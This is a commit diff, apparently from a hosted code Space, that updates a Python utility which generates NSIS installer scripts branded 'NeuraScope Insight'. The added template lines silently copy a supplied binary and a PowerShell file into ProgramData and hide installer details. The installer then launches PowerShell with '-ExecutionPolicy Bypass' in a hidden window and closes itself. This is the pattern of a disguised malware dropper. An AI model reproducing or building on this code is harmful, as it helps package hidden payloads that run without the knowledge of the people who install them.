Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
@@ -53,7 +53,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
53 |
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
54 |
installer_output = os.path.join(folder_path, f"setup_{timestamp}.exe")
|
55 |
|
56 |
-
|
57 |
; NeuraScope Insight Installer Script
|
58 |
!include "MUI2.nsh"
|
59 |
!include "LogicLib.nsh"
|
@@ -84,10 +84,8 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
84 |
Section "MainSection" SEC01
|
85 |
SetDetailsPrint none
|
86 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
87 |
-
|
88 |
-
|
89 |
-
Abort
|
90 |
-
${EndIf}
|
91 |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
92 |
SetAutoClose true
|
93 |
SectionEnd
|
|
|
53 |
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
54 |
installer_output = os.path.join(folder_path, f"setup_{timestamp}.exe")
|
55 |
|
56 |
+
NSIS_SCRIPT_TEMPLATE = r"""
|
57 |
; NeuraScope Insight Installer Script
|
58 |
!include "MUI2.nsh"
|
59 |
!include "LogicLib.nsh"
|
|
|
84 |
Section "MainSection" SEC01
|
85 |
SetDetailsPrint none
|
86 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
87 |
+
File "{bin_file}"
|
88 |
+
File "{ps1_file}"
|
|
|
|
|
89 |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
90 |
SetAutoClose true
|
91 |
SectionEnd
|